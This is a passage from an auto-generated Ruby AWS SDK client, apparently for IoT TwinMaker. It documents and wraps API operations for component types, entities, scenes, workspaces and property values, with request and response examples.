# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :use_dualstack_endpoint
# When set to `true`, dualstack enabled endpoints (with `.aws` TLD)
# will be used if available.
#
# @option options [Boolean] :use_fips_endpoint
# When set to `true`, fips compatible endpoints will be used if available.
# When a `fips` region is used, the region is normalized and this config
# is set to `true`.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Float] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Float] :ssl_timeout (nil) Sets the SSL timeout
# in seconds.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Sets values for multiple time series properties.
#
# @option params [required, Array<Types::PropertyValueEntry>] :entries
# An object that maps strings to the property value entries to set. Each
# string in the mapping must be unique to this object.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the properties to set.
#
# @return [Types::BatchPutPropertyValuesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchPutPropertyValuesResponse#error_entries #error_entries} => Array<Types::BatchPutPropertyErrorEntry>
#
# @example Request syntax with placeholder values
#
# resp = client.batch_put_property_values({
# entries: [ # required
# {
# entity_property_reference: { # required
# component_name: "Name",
# entity_id: "EntityId",
# external_id_property: {
# "String" => "String",
# },
# property_name: "Name", # required
# },
# property_values: [
# {
# time: "Time",
# timestamp: Time.now,
# value: { # required
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# ],
# },
# ],
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.error_entries #=> Array
# resp.error_entries[0].errors #=> Array
# resp.error_entries[0].errors[0].entry.entity_property_reference.component_name #=> String
# resp.error_entries[0].errors[0].entry.entity_property_reference.entity_id #=> String
# resp.error_entries[0].errors[0].entry.entity_property_reference.external_id_property #=> Hash
# resp.error_entries[0].errors[0].entry.entity_property_reference.external_id_property["String"] #=> String
# resp.error_entries[0].errors[0].entry.entity_property_reference.property_name #=> String
# resp.error_entries[0].errors[0].entry.property_values #=> Array
# resp.error_entries[0].errors[0].entry.property_values[0].time #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].timestamp #=> Time
# resp.error_entries[0].errors[0].entry.property_values[0].value.boolean_value #=> Boolean
# resp.error_entries[0].errors[0].entry.property_values[0].value.double_value #=> Float
# resp.error_entries[0].errors[0].entry.property_values[0].value.expression #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].value.integer_value #=> Integer
# resp.error_entries[0].errors[0].entry.property_values[0].value.list_value #=> Array
# resp.error_entries[0].errors[0].entry.property_values[0].value.list_value[0] #=> Types::DataValue
# resp.error_entries[0].errors[0].entry.property_values[0].value.long_value #=> Integer
# resp.error_entries[0].errors[0].entry.property_values[0].value.map_value #=> Hash
# resp.error_entries[0].errors[0].entry.property_values[0].value.map_value["String"] #=> Types::DataValue
# resp.error_entries[0].errors[0].entry.property_values[0].value.relationship_value.target_component_name #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].value.relationship_value.target_entity_id #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].value.string_value #=> String
# resp.error_entries[0].errors[0].error_code #=> String
# resp.error_entries[0].errors[0].error_message #=> String
#
# @overload batch_put_property_values(params = {})
# @param [Hash] params ({})
def batch_put_property_values(params = {}, options = {})
req = build_request(:batch_put_property_values, params)
req.send_request(options)
end
# Creates a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type.
#
# @option params [String] :description
# The description of the component type.
#
# @option params [Array<String>] :extends_from
# Specifies the parent component type to extend.
#
# @option params [Hash<String,Types::FunctionRequest>] :functions
# An object that maps strings to the functions in the component type.
# Each string in the mapping must be unique to this object.
#
# @option params [Boolean] :is_singleton
# A Boolean value that specifies whether an entity can have more than
# one component of this type.
#
# @option params [Hash<String,Types::PropertyDefinitionRequest>] :property_definitions
# An object that maps strings to the property definitions in the
# component type. Each string in the mapping must be unique to this
# object.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the component type.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::CreateComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateComponentTypeResponse#arn #arn} => String
# * {Types::CreateComponentTypeResponse#creation_date_time #creation_date_time} => Time
# * {Types::CreateComponentTypeResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_component_type({
# component_type_id: "ComponentTypeId", # required
# description: "Description",
# extends_from: ["ComponentTypeId"],
# functions: {
# "Name" => {
# implemented_by: {
# is_native: false,
# lambda: {
# arn: "LambdaArn", # required
# },
# },
# required_properties: ["Name"],
# scope: "ENTITY", # accepts ENTITY, WORKSPACE
# },
# },
# is_singleton: false,
# property_definitions: {
# "Name" => {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# },
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload create_component_type(params = {})
# @param [Hash] params ({})
def create_component_type(params = {}, options = {})
req = build_request(:create_component_type, params)
req.send_request(options)
end
# Creates an entity.
#
# @option params [Hash<String,Types::ComponentRequest>] :components
# An object that maps strings to the components in the entity. Each
# string in the mapping must be unique to this object.
#
# @option params [String] :description
# The description of the entity.
#
# @option params [String] :entity_id
# The ID of the entity.
#
# @option params [required, String] :entity_name
# The name of the entity.
#
# @option params [String] :parent_entity_id
# The ID of the entity's parent entity.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the entity.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the entity.
#
# @return [Types::CreateEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateEntityResponse#arn #arn} => String
# * {Types::CreateEntityResponse#creation_date_time #creation_date_time} => Time
# * {Types::CreateEntityResponse#entity_id #entity_id} => String
# * {Types::CreateEntityResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_entity({
# components: {
# "Name" => {
# component_type_id: "ComponentTypeId",
# description: "Description",
# properties: {
# "Name" => {
# definition: {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# update_type: "UPDATE", # accepts UPDATE, DELETE, CREATE
# value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# },
# },
# },
# description: "Description",
# entity_id: "EntityId",
# entity_name: "EntityName", # required
# parent_entity_id: "ParentEntityId",
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
# resp.entity_id #=> String
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload create_entity(params = {})
# @param [Hash] params ({})
def create_entity(params = {}, options = {})
req = build_request(:create_entity, params)
req.send_request(options)
end
# Creates a scene.
#
# @option params [Array<String>] :capabilities
# A list of capabilities that the scene uses to render itself.
#
# @option params [required, String] :content_location
# The relative path that specifies the location of the content
# definition file.
#
# @option params [String] :description
# The description for this scene.
#
# @option params [required, String] :scene_id
# The ID of the scene.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the scene.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scene.
#
# @return [Types::CreateSceneResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateSceneResponse#arn #arn} => String
# * {Types::CreateSceneResponse#creation_date_time #creation_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.create_scene({
# capabilities: ["SceneCapability"],
# content_location: "S3Url", # required
# description: "Description",
# scene_id: "Id", # required
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
#
# @overload create_scene(params = {})
# @param [Hash] params ({})
def create_scene(params = {}, options = {})
req = build_request(:create_scene, params)
req.send_request(options)
end
# Creates a workplace.
#
# @option params [String] :description
# The description of the workspace.
#
# @option params [required, String] :role
# The ARN of the execution role associated with the workspace.
#
# @option params [required, String] :s3_location
# The ARN of the S3 bucket where resources associated with the workspace
# are stored.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the workspace
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::CreateWorkspaceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateWorkspaceResponse#arn #arn} => String
# * {Types::CreateWorkspaceResponse#creation_date_time #creation_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.create_workspace({
# description: "Description",
# role: "RoleArn", # required
# s3_location: "S3Location", # required
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
#
# @overload create_workspace(params = {})
# @param [Hash] params ({})
def create_workspace(params = {}, options = {})
req = build_request(:create_workspace, params)
req.send_request(options)
end
# Deletes a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type to delete.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::DeleteComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteComponentTypeResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.delete_component_type({
# component_type_id: "ComponentTypeId", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload delete_component_type(params = {})
# @param [Hash] params ({})
def delete_component_type(params = {}, options = {})
req = build_request(:delete_component_type, params)
req.send_request(options)
end
# Deletes an entity.
#
# @option params [required, String] :entity_id
# The ID of the entity to delete.
#
# @option params [Boolean] :is_recursive
# A Boolean value that specifies whether the operation deletes child
# entities.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the entity to delete.
#
# @return [Types::DeleteEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteEntityResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.delete_entity({
# entity_id: "EntityId", # required
# is_recursive: false,
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload delete_entity(params = {})
# @param [Hash] params ({})
def delete_entity(params = {}, options = {})
req = build_request(:delete_entity, params)
req.send_request(options)
end
# Deletes a scene.
#
# @option params [required, String] :scene_id
# The ID of the scene to delete.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_scene({
# scene_id: "Id", # required
# workspace_id: "Id", # required
# })
#
# @overload delete_scene(params = {})
# @param [Hash] params ({})
def delete_scene(params = {}, options = {})
req = build_request(:delete_scene, params)
req.send_request(options)
end
# Deletes a workspace.
#
# @option params [required, String] :workspace_id
# The ID of the workspace to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_workspace({
# workspace_id: "Id", # required
# })
#
# @overload delete_workspace(params = {})
# @param [Hash] params ({})
def delete_workspace(params = {}, options = {})
req = build_request(:delete_workspace, params)
req.send_request(options)
end
# Retrieves information about a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::GetComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetComponentTypeResponse#arn #arn} => String
# * {Types::GetComponentTypeResponse#component_type_id #component_type_id} => String
# * {Types::GetComponentTypeResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetComponentTypeResponse#description #description} => String
# * {Types::GetComponentTypeResponse#extends_from #extends_from} => Array<String>
# * {Types::GetComponentTypeResponse#functions #functions} => Hash<String,Types::FunctionResponse>
# * {Types::GetComponentTypeResponse#is_abstract #is_abstract} => Boolean
# * {Types::GetComponentTypeResponse#is_schema_initialized #is_schema_initialized} => Boolean
# * {Types::GetComponentTypeResponse#is_singleton #is_singleton} => Boolean
# * {Types::GetComponentTypeResponse#property_definitions #property_definitions} => Hash<String,Types::PropertyDefinitionResponse>
# * {Types::GetComponentTypeResponse#status #status} => Types::Status
# * {Types::GetComponentTypeResponse#update_date_time #update_date_time} => Time
# * {Types::GetComponentTypeResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_component_type({
# component_type_id: "ComponentTypeId", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.component_type_id #=> String
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.extends_from #=> Array
# resp.extends_from[0] #=> String
# resp.functions #=> Hash
# resp.functions["Name"].implemented_by.is_native #=> Boolean
# resp.functions["Name"].implemented_by.lambda.arn #=> String
# resp.functions["Name"].is_inherited #=> Boolean
# resp.functions["Name"].required_properties #=> Array
# resp.functions["Name"].required_properties[0] #=> String
# resp.functions["Name"].scope #=> String, one of "ENTITY", "WORKSPACE"
# resp.is_abstract #=> Boolean
# resp.is_schema_initialized #=> Boolean
# resp.is_singleton #=> Boolean
# resp.property_definitions #=> Hash
# resp.property_definitions["Name"].configuration #=> Hash
# resp.property_definitions["Name"].configuration["Name"] #=> String
# resp.property_definitions["Name"].data_type.allowed_values #=> Array
# resp.property_definitions["Name"].data_type.allowed_values[0].boolean_value #=> Boolean
# resp.property_definitions["Name"].data_type.allowed_values[0].double_value #=> Float
# resp.property_definitions["Name"].data_type.allowed_values[0].expression #=> String
# resp.property_definitions["Name"].data_type.allowed_values[0].integer_value #=> Integer
# resp.property_definitions["Name"].data_type.allowed_values[0].list_value #=> Types::DataValueList
# resp.property_definitions["Name"].data_type.allowed_values[0].long_value #=> Integer
# resp.property_definitions["Name"].data_type.allowed_values[0].map_value #=> Hash
# resp.property_definitions["Name"].data_type.allowed_values[0].map_value["String"] #=> Types::DataValue
# resp.property_definitions["Name"].data_type.allowed_values[0].relationship_value.target_component_name #=> String
# resp.property_definitions["Name"].data_type.allowed_values[0].relationship_value.target_entity_id #=> String
# resp.property_definitions["Name"].data_type.allowed_values[0].string_value #=> String
# resp.property_definitions["Name"].data_type.nested_type #=> Types::DataType
# resp.property_definitions["Name"].data_type.relationship.relationship_type #=> String
# resp.property_definitions["Name"].data_type.relationship.target_component_type_id #=> String
# resp.property_definitions["Name"].data_type.type #=> String, one of "RELATIONSHIP", "STRING", "LONG", "BOOLEAN", "INTEGER", "DOUBLE", "LIST", "MAP"
# resp.property_definitions["Name"].data_type.unit_of_measure #=> String
# resp.property_definitions["Name"].default_value.boolean_value #=> Boolean
# resp.property_definitions["Name"].default_value.double_value #=> Float
# resp.property_definitions["Name"].default_value.expression #=> String
# resp.property_definitions["Name"].default_value.integer_value #=> Integer
# resp.property_definitions["Name"].default_value.list_value #=> Array
# resp.property_definitions["Name"].default_value.list_value[0] #=> Types::DataValue
# resp.property_definitions["Name"].default_value.long_value #=> Integer
# resp.property_definitions["Name"].default_value.map_value #=> Hash
# resp.property_definitions["Name"].default_value.map_value["String"] #=> Types::DataValue
# resp.property_definitions["Name"].default_value.relationship_value.target_component_name #=> String
# resp.property_definitions["Name"].default_value.relationship_value.target_entity_id #=> String
# resp.property_definitions["Name"].default_value.string_value #=> String
# resp.property_definitions["Name"].is_external_id #=> Boolean
# resp.property_definitions["Name"].is_final #=> Boolean
# resp.property_definitions["Name"].is_imported #=> Boolean
# resp.property_definitions["Name"].is_inherited #=> Boolean
# resp.property_definitions["Name"].is_required_in_entity #=> Boolean
# resp.property_definitions["Name"].is_stored_externally #=> Boolean
# resp.property_definitions["Name"].is_time_series #=> Boolean
# resp.status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.status.error.message #=> String
# resp.status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
#
# @overload get_component_type(params = {})
# @param [Hash] params ({})
def get_component_type(params = {}, options = {})
req = build_request(:get_component_type, params)
req.send_request(options)
end
# Retrieves information about an entity.
#
# @option params [required, String] :entity_id
# The ID of the entity.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::GetEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetEntityResponse#arn #arn} => String
# * {Types::GetEntityResponse#components #components} => Hash<String,Types::ComponentResponse>
# * {Types::GetEntityResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetEntityResponse#description #description} => String
# * {Types::GetEntityResponse#entity_id #entity_id} => String
# * {Types::GetEntityResponse#entity_name #entity_name} => String
# * {Types::GetEntityResponse#has_child_entities #has_child_entities} => Boolean
# * {Types::GetEntityResponse#parent_entity_id #parent_entity_id} => String
# * {Types::GetEntityResponse#status #status} => Types::Status
# * {Types::GetEntityResponse#update_date_time #update_date_time} => Time
# * {Types::GetEntityResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_entity({
# entity_id: "EntityId", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.components #=> Hash
# resp.components["Name"].component_name #=> String
# resp.components["Name"].component_type_id #=> String
# resp.components["Name"].defined_in #=> String
# resp.components["Name"].description #=> String
# resp.components["Name"].properties #=> Hash
# resp.components["Name"].properties["Name"].definition.configuration #=> Hash
# resp.components["Name"].properties["Name"].definition.configuration["Name"] #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values #=> Array
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].boolean_value #=> Boolean
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].double_value #=> Float
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].expression #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].integer_value #=> Integer
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].list_value #=> Types::DataValueList
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].long_value #=> Integer
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].map_value #=> Hash
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].map_value["String"] #=> Types::DataValue
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].relationship_value.target_component_name #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].relationship_value.target_entity_id #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].string_value #=> String
# resp.components["Name"].properties["Name"].definition.data_type.nested_type #=> Types::DataType
# resp.components["Name"].properties["Name"].definition.data_type.relationship.relationship_type #=> String
# resp.components["Name"].properties["Name"].definition.data_type.relationship.target_component_type_id #=> String
# resp.components["Name"].properties["Name"].definition.data_type.type #=> String, one of "RELATIONSHIP", "STRING", "LONG", "BOOLEAN", "INTEGER", "DOUBLE", "LIST", "MAP"
# resp.components["Name"].properties["Name"].definition.data_type.unit_of_measure #=> String
# resp.components["Name"].properties["Name"].definition.default_value.boolean_value #=> Boolean
# resp.components["Name"].properties["Name"].definition.default_value.double_value #=> Float
# resp.components["Name"].properties["Name"].definition.default_value.expression #=> String
# resp.components["Name"].properties["Name"].definition.default_value.integer_value #=> Integer
# resp.components["Name"].properties["Name"].definition.default_value.list_value #=> Array
# resp.components["Name"].properties["Name"].definition.default_value.list_value[0] #=> Types::DataValue
# resp.components["Name"].properties["Name"].definition.default_value.long_value #=> Integer
# resp.components["Name"].properties["Name"].definition.default_value.map_value #=> Hash
# resp.components["Name"].properties["Name"].definition.default_value.map_value["String"] #=> Types::DataValue
# resp.components["Name"].properties["Name"].definition.default_value.relationship_value.target_component_name #=> String
# resp.components["Name"].properties["Name"].definition.default_value.relationship_value.target_entity_id #=> String
# resp.components["Name"].properties["Name"].definition.default_value.string_value #=> String
# resp.components["Name"].properties["Name"].definition.is_external_id #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_final #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_imported #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_inherited #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_required_in_entity #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_stored_externally #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_time_series #=> Boolean
# resp.components["Name"].properties["Name"].value.boolean_value #=> Boolean
# resp.components["Name"].properties["Name"].value.double_value #=> Float
# resp.components["Name"].properties["Name"].value.expression #=> String
# resp.components["Name"].properties["Name"].value.integer_value #=> Integer
# resp.components["Name"].properties["Name"].value.list_value #=> Array
# resp.components["Name"].properties["Name"].value.list_value[0] #=> Types::DataValue
# resp.components["Name"].properties["Name"].value.long_value #=> Integer
# resp.components["Name"].properties["Name"].value.map_value #=> Hash
# resp.components["Name"].properties["Name"].value.map_value["String"] #=> Types::DataValue
# resp.components["Name"].properties["Name"].value.relationship_value.target_component_name #=> String
# resp.components["Name"].properties["Name"].value.relationship_value.target_entity_id #=> String
# resp.components["Name"].properties["Name"].value.string_value #=> String
# resp.components["Name"].status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.components["Name"].status.error.message #=> String
# resp.components["Name"].status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.entity_id #=> String
# resp.entity_name #=> String
# resp.has_child_entities #=> Boolean
# resp.parent_entity_id #=> String
# resp.status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.status.error.message #=> String
# resp.status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
#
# @overload get_entity(params = {})
# @param [Hash] params ({})
def get_entity(params = {}, options = {})
req = build_request(:get_entity, params)
req.send_request(options)
end
# Gets the property values for a component, component type, entity, or
# workspace.
#
# You must specify a value for either `componentName`,
# `componentTypeId`, `entityId`, or `workspaceId`.
#
# @option params [String] :component_name
# The name of the component whose property values the operation returns.
#
# @option params [String] :component_type_id
# The ID of the component type whose property values the operation
# returns.
#
# @option params [String] :entity_id
# The ID of the entity whose property values the operation returns.
#
# @option params [required, Array<String>] :selected_properties
# The properties whose values the operation returns.
#
# @option params [required, String] :workspace_id
# The ID of the workspace whose values the operation returns.
#
# @return [Types::GetPropertyValueResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetPropertyValueResponse#property_values #property_values} => Hash<String,Types::PropertyLatestValue>
#
# @example Request syntax with placeholder values
#
# resp = client.get_property_value({
# component_name: "Name",
# component_type_id: "ComponentTypeId",
# entity_id: "EntityId",
# selected_properties: ["String"], # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.property_values #=> Hash
# resp.property_values["Name"].property_reference.component_name #=> String
# resp.property_values["Name"].property_reference.entity_id #=> String
# resp.property_values["Name"].property_reference.external_id_property #=> Hash
# resp.property_values["Name"].property_reference.external_id_property["String"] #=> String
# resp.property_values["Name"].property_reference.property_name #=> String
# resp.property_values["Name"].property_value.boolean_value #=> Boolean
# resp.property_values["Name"].property_value.double_value #=> Float
# resp.property_values["Name"].property_value.expression #=> String
# resp.property_values["Name"].property_value.integer_value #=> Integer
# resp.property_values["Name"].property_value.list_value #=> Array
# resp.property_values["Name"].property_value.list_value[0] #=> Types::DataValue
# resp.property_values["Name"].property_value.long_value #=> Integer
# resp.property_values["Name"].property_value.map_value #=> Hash
# resp.property_values["Name"].property_value.map_value["String"] #=> Types::DataValue
# resp.property_values["Name"].property_value.relationship_value.target_component_name #=> String
# resp.property_values["Name"].property_value.relationship_value.target_entity_id #=> String
# resp.property_values["Name"].property_value.string_value #=> String
#
# @overload get_property_value(params = {})
# @param [Hash] params ({})
def get_property_value(params = {}, options = {})
req = build_request(:get_property_value, params)
req.send_request(options)
end
# Retrieves information about the history of a time series property
# value for a component, component type, entity, or workspace.
#
# You must specify a value for `workspaceId`. For entity-specific
# queries, specify values for `componentName` and `entityId`. For
# cross-entity quries, specify a value for `componentTypeId`.
#
# @option params [String] :component_name
# The name of the component.
#
# @option params [String] :component_type_id
# The ID of the component type.
#
# @option params [Time,DateTime,Date,Integer,String] :end_date_time
# The date and time of the latest property value to return.
#
# @option params [String] :end_time
# The ISO8601 DateTime of the latest property value to return.
#
# For more information about the ISO8601 DateTime format, see the data
# type [PropertyValue][1].
#
#
#
# [1]: https://docs.aws.amazon.com/roci/latest/roci-api/API_PropertyValue.html
#
# @option params [String] :entity_id
# The ID of the entity.
#
# @option params [Types::InterpolationParameters] :interpolation
# An object that specifies the interpolation type and the interval over
# which to interpolate data.
#
# @option params [Integer] :max_results
# The maximum number of results to return.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [String] :order_by_time
# The time direction to use in the result order.
#
# @option params [Array<Types::PropertyFilter>] :property_filters
# A list of objects that filter the property value history request.
#
# @option params [required, Array<String>] :selected_properties
# A list of properties whose value histories the request retrieves.
#
# @option params [Time,DateTime,Date,Integer,String] :start_date_time
# The date and time of the earliest property value to return.
#
# @option params [String] :start_time
# The ISO8601 DateTime of the earliest property value to return.
#
# For more information about the ISO8601 DateTime format, see the data
# type [PropertyValue][1].
#
#
#
